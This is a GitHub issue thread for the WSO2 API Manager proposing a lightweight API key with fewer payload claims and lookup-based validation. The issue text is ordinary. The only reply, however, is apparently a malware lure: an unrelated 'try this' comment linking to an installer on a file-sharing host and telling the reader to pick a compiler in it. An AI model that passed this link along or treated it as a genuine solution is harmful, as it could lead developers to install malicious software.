### ISSUE TITLE
Implement Lightweight API Key by Removing Unnecessary Claims from the Existing API Key

### ISSUE THREAD

**Issue by dakshina99** [wso2/api-manager#3097]
### Problem

The current API Key implementation in the API Manager includes several claims that are not essential for the API Key itself but are required during the API Key authentication process. These claims can be removed from the API Key payload to reduce its size and complexity.

### Solution

1. Identify Unnecessary Claims
   - List the claims currently included in the API Key that are not required for the key to function effectively.
2. Modify API Key Structure
   - Remove the identified unnecessary claims from the API Key payload.
   - Ensure that the remaining claims still allow for the secure and efficient validation of the API Key.
3. Enhance Authentication Process
   - Adjust the API Key authentication mechanism to retrieve the necessary information from the data store when validating the API Key.
   - Ensure that the changes do not introduce performance bottlenecks or security vulnerabilities.
4. Backward Compatibility
   - Consider providing an option to support the old API Key format for a transition period.
   - Include a migration guide for users who need to switch to the new lightweight API Key format.

### Affected Component

APIM

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
